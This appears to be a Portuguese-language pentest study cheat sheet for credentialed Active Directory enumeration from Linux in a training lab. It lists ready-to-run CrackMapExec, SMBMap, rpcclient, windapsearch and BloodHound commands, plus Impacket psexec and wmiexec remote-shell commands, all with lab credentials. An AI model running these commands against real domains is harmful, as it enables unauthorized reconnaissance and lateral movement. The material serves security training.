LinkedinTryHackme

Credentialed Enumeration - from Linux

CrackMapExec

  • CME - Enumeração de Usuários de Domínio

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users

  • CME - Enumeração de Grupo de Domínio

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups

  • CME - Usuários conectados

sudo crackmapexec smb 172.16.5.130 -u forend -p Klmcargo2 --loggedon-users

  • Enumeração de compartilhamento - Controlador de domínio

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares

  • Spider_plus

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'

SMBMap

  • SMBMap para verificar o acesso

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5

  • Lista recursiva de todos os diretórios

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' --dir-only

rpcclient

rpcclient -U "" -N 172.16.5.5

  • RPCClient User Enumeration By RID

queryuser 0x457

  • Enumdomusers

enumdomusers

Impacket Toolkit

  • Usando psexec.py

psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.130

  • Usando wmiexec.py

wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.130

Windapsearch

  • Windapsearch - Administradores de domínio

python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da

  • Windapsearch - Usuários Privilegiados

python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU

Bloodhound.py

  • Executando BloodHound.py

sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all

  • Carregue o arquivo Zip na GUI do BloodHound

sudo neo4j start

  • Digitar bloodhound

  • Compactar os arquivos, ao invés de carregá-los um por um

zip -r ilfreight_bh.zip *.json

Outros

Folha de dicas interativa - WADComs

PreviousEnumerating Security ControlsNextCredentialed Enumeration - from Windows

Last updated